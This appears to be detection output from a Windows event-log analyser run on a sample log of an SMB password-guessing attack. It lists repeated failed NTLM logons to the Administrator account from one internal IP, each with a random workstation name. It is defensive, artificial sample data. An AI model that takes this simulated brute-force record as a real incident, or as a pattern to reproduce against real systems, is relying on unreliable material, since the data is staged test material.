+2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HpdCohLheoqQ6DXw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xHS3sclMwgHuH8rE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sNSheImuQwgOEH5g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GX5y374mlYYXbAB2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eaFRL6q9KQY5bFHZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MrkEyJmfLiSrvQGs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Fd1vJiJa3pdjqdQV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RVrZl3LOIa7VLhT7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TKR8KbyQkwRX1qTE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GY22XuDxbE5lvEra  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4AntiX3j9HLHcOOq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XIvMbod41WeNADy5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0UL4lb3CCrv7YfGQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OyRktDjPqFyrdSTQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HKEGmAH8Wbc7f3jC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 06Dfi4lO2Vdw3gCr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 29eXmenUTACkAHKC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2Zq7Gl6hnKDJJqFc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jKENlWYt6m78taZR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 822SUU2Hg6w6AqQh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bROU0Mk9Z4yEq323  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EKfVPleDpLLqkuKq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NGWVqbchMitnLVYT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y7K9vifU9lWwpP9J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oIgKYj210JfICJXv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jisuKilPQivTV8yE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hckyoom0XnqpRzK8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: De0l6qgcuhMERjMY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SSa7pylPWn8jl2Ox  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ol9OntO4hqidlNUi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kXOBF0ZWLxMauHuT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WVBFJltkR5vnmpYD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kHVXEHq9zNYdfTpZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OIw3BxmLsfwDXXFg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hhgRhjnhkRJus4fw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xz78guWXrekEvuFT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 04wNT26RJmriQrfH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XmbuuymdSpfNldt2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yqJarBVOImq5Tn2p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BZYExQroYH65tPuG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: llU5DQBrIrV3VtG5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HV17iXOYQqs2ntax  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: esZnEeyGdPa22PsL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rlYFTP9a2wdi5A2n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oJifU0PnO1Ntp6z3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xGKdKjJy28Qd1whT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x3L4BYjYJYlvuYHE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ui5RoLKttDo0wfFJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: G2xjdWobsxBjo6p7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TPeQ0M5lXITI84G3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uu72qx4lG5ZRM7xf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zD072YR1hIgbzjaT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EqA7HDvImIlCiFq2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: efYFxZwMGEC3vVi7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6WmMHYegvFJvv6zd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DS9WkRnP0B5MgaeX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y5jNPV7ZgFExgg9n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V1FJ6vm3wK97iual  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GLuIx0sfF8NQD8QY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y3lMvcrrmGTkjdlh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2ZqOabcNMeazs6TC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j2AbE9D8PvuFDBz5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wzWdLEEc68ZvviGh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.030 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AtV3BuZiljbAeikO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tnKKfcwikNDdYOam  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jSbbzD7fpJY4Q1JL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gOASpLLE25ruCnGW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1jhUGOtszbPUwccL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yB8Mzo1RppdpLFKS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rOwoUlHGVeSbAhuN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BXIEHbkrjwedeaih  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OvsKoixgEzUgAyie  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
